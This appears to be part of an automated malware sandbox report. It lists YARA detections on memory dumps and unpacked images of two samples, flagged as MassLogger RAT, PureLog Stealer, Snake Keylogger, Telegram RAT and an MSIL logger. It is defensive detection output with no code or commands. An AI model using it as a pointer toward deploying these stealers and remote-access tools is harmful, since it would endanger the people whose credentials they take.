Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2957921883.000000000268B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2956686994.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2954971703.00000000025AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7820, type: MEMORYSTR

Remote Access Functionality

Yara detected MSIL Logger

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
